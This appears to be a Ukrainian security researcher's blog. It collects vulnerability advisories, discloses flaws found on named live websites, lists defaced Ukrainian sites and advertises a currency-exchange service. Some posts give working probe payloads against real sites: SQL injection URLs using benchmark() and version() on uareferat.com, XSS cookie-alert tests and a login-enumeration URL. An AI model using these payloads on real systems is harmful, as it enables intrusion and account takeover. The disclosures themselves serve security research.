Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Openfire multiple vulnerabilities (деталі)
• USER OPTIONS CHANGER EXPLOIT MiniTwitter v0.2-Beta (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES MiniTwitter v0.2-Beta (деталі)
• BLIND SQL INJECTION Leap CMS 0.1.4 (деталі)
• Walusoft TFTPServer2000 Version 3.6.1 Directory Traversal (деталі)
• MULTPLE REMOTE VULNERABILITIES ProjectCMS v-1.1 Beta (деталі)
• Cross-Site Scripting vulnerability in MyBB 1.4.5 (деталі)
• Coppermine Photo Gallery 1.4.21 Cross-Site Scripting (деталі)
• New drupal6 packages fix multiple vulnerabilities (деталі)
• SQL INJECTION VULNERABILITIES ST-Gallery version 0.1 alpha (деталі)

З початку грудня я розпочав свій новий проект. В якому я пропоную послуги виводу WebMoney на кредитні карти (Visa, MasterCard) і поповнення WebMoney із кредитних карт. А також обмін електронних валют WebMoney на LiqPAY і LiqPAY на WebMoney.

Детально про даний проект та про поточні комісії ви можете прочитати в мене на форумі та на форумі hackua.com.

Як я зазначив на форумах, можливий вивід з банкомата через систему LiqPAY. ПриватБанк з недавніх пір дозволяє знімати гроші в банкоматах з рахунку в LiqPAY навіть без картки (потрібно лише мати свій мобільний телефон).

Тобто не виводити з LiqPAY на картку, а потім змімати гроші в банкоматі, а одразу знімати в банкоматі гроші з рахунку LiqPAY. Так що люди можуть через мене обмінювати WebMoney на LiqPAY і виводити в готівку в банкоматах Приватбанку.

Але як я сьогодні перевірив під час досліджень даної функції ПриватБанку по виводу з банкомата через систему LiqPAY, цілком без карти вивести гроші не вийде.

Із собою обов’язково потрібно мати кредитну карту, окрім телефону. Це м.б. карта як приватовська, так і будь-якого іншого банку (це може бути навіть карта на якій немає коштів). Це пов’язано з тим, що приватовський банкомат, як це звичайно і буває в банкоматів, надає доступ до меню тільки після вставки карти в банкомат.

Так що потрібно мати із собою кредитну карту, вставити її в банкомат і ввести пін код (при цьому операцій з кредиткою проводитися не буде - це такий собі хакерський обхід обмежень банкомата). І після чого вибрати в меню вивід готівки з рахунка в LiqPAY (дотримуючись інструкцій Приватбанку).

03.08.2009

У грудні, 12.12.2008, я знайшов Insufficient Anti-automation, Abuse of Functionality та Cross-Site Scripting уразливості на проекті http://www.interface.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.interface.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

11.12.2009

Insufficient Anti-automation:

http://www.interface.ru/services/mailfrompage.asp

Відсутній захист від автоматизованих запитів (капча).

Abuse of Functionality:

http://www.interface.ru/services/mailfrompage.asp

В параметрі toaddr можна задати довільний емайл адрес. Що дозволяє розсилати спам, враховуючи можливість модифікації й інших полів форми. А з врахуванням Insufficient Anti-automation, дана уразливість створює з форми цілий Spam Gateway.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

В даній добірці експлоіти в веб додатках:

• AMember 3.1.7 (XSS/SQL/HI) Multiple Remote Vulnerabilities (деталі)
• Small Pirates v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities (деталі)
• Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability (деталі)
• Million Dollar Text Links <= 1.0 (id) SQL injection Vulnerability (деталі)
• ZeusCart <= 2.3 (maincatid) SQL Injection Vulnerability (деталі)
• Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability (деталі)
• ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities (деталі)
• Zen Help Desk 2.1 (Auth Bypass) SQL Injection Vulnerability (деталі)
• Webboard <= v.2.90 beta Remote File Disclosure Vulnerability (деталі)
• Linksys WAG54G2 Web Management Console Arbitrary Command Exec (деталі)
• RadCLASSIFIEDS Gold v2 (seller) Remote SQL Injection Exploit (деталі)
• OCS Inventory NG 1.02 Multiple SQL Injection Vulnerabilities (деталі)
• eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulnerabilities (деталі)
• Open-school 1.0 (id) Remote SQL Injection Vulnerability (деталі)
• Exploits WysGui CMS 1.2 BETA(cookie) BSQL (деталі)

У квітні, 15.04.2009, я знайшов Abuse of Functionality та Insufficient Anti-automation уразливості на проекті http://yashik.tv (відео хостінг). Як я нещодавно вияснив, проект yashik.tv змінів домен на video.tochka.net (і від зміни домена дірки нікуди не ділися).

Дані уразливості подібні до уразливостей на www.google.com та на багатьох інших сайтах.

Abuse of Functionality:

На сторінці реєстрації http://video.tochka.net/register/ функція “Проверить”, яка призначена для перевірки чи вільний даний логін, дозволяє дізнатися логіни користувачів в системі. В тому числі, Login Enumeration атаку можна провести через GET запит: http://video.tochka.net/register/check_username/?login=test.

Insufficient Anti-automation:

Враховучи, що дана функція немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів користувачів. Що може бути зроблено за допомогою брутфорсерів логінів, зокрема, моєї програми Brute force login identifier.

В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів сайта.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.vforum.com.ua (хакером Mr.P3rfekt) - 05.12.2009, зараз сайт вже виправлений адмінами
• http://www.hladotech.com.ua (хакером 32rferkipper)
• http://ssa.kpi.ua (хакером XUGURX) - це все той же ssa.ntu-kpi.kiev.ua, похаканий в 2008 році і все ще не виправлений
• http://www.acmagistral.com.ua (хакером CmTr) - 01.12.2009, зараз сайт вже виправлений адмінами
• http://ynik.org.ua (хакером Cyber_945) - 31.10.2009, зараз сайт вже виправлений адмінами

25.11.2009

Виявлені численні уразливості безпеки в PHP.

Уразливі версії: PHP 5.3.

Вихід з обмеженого середовища safe_mode через різні функції.

• Vulnerabilities in PHP (деталі)

10.12.2009

Додаткова інформація.

• PHP 5.3.1 open_basedir bypass (деталі)

В даній добірці уразливості в веб додатках:

• Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit (деталі)
• Formshield Captcha - Older Version vulnerable to replay attacks (деталі)
• Hewlett-Packard OVIS Probe Builder Arbitrary Process Termination Vulnerability (деталі)
• HP OpenView Internet Services Running Probe Builder, Remote Denial of Service (DoS) (деталі)
• SQL INJECTION (SHELL UPLOAD) EZ-blog Beta2 (деталі)
• MataChat Cross-Site Scripting Vulnerabilities (деталі)
• MULTIPLE REMOTE SQL INJECTION VULNERABILITIES MIM:InfiniX v1.2.003 (деталі)
• New vulnerabilities in Aardvark Topsites PHP (деталі)
• MULTIPLE REMOTE VULNERABILITIES Leap CMS 0.1.4 (деталі)
• SQL INJECTION (SQLi) VULNERABILITY ProjectCMS v1.0 Beta Final (деталі)

Виявлена можливість підміни діалогового вікна в Mozilla Firefox.

Уразливі версії: Mozilla Firefox 3.x.

Можливе некоректне відображення URL запиту.

• Mozilla Firefox JavaScript Prompt Spoofing Weakness (деталі)

14.02.2009

У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на проекті http://uareferat.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

09.12.2009

SQL DB Structure Extraction:

http://uareferat.com/rus/details/13220/

http://uareferat.com/rus/referaty/’/

http://uareferat.com/rus/’/

http://uareferat.com/rus/referaty/1/-1/

http://uareferat.com/abton/

SQL Injection:

http://uareferat.com/rus/details/’+benchmark(10000,md5(now()))+’/

http://uareferat.com/rus/referaty/1′+version()-’1/

Вивело п’ятий розділ сайта, значить MySQL 5.x.

http://uareferat.com/rus/referaty/1?+benchmark(10000,md5(now()))-’1/

http://uareferat.com/rus/’+benchmark(10000,md5(now()))+’/

Дані уразливості вже виправлені.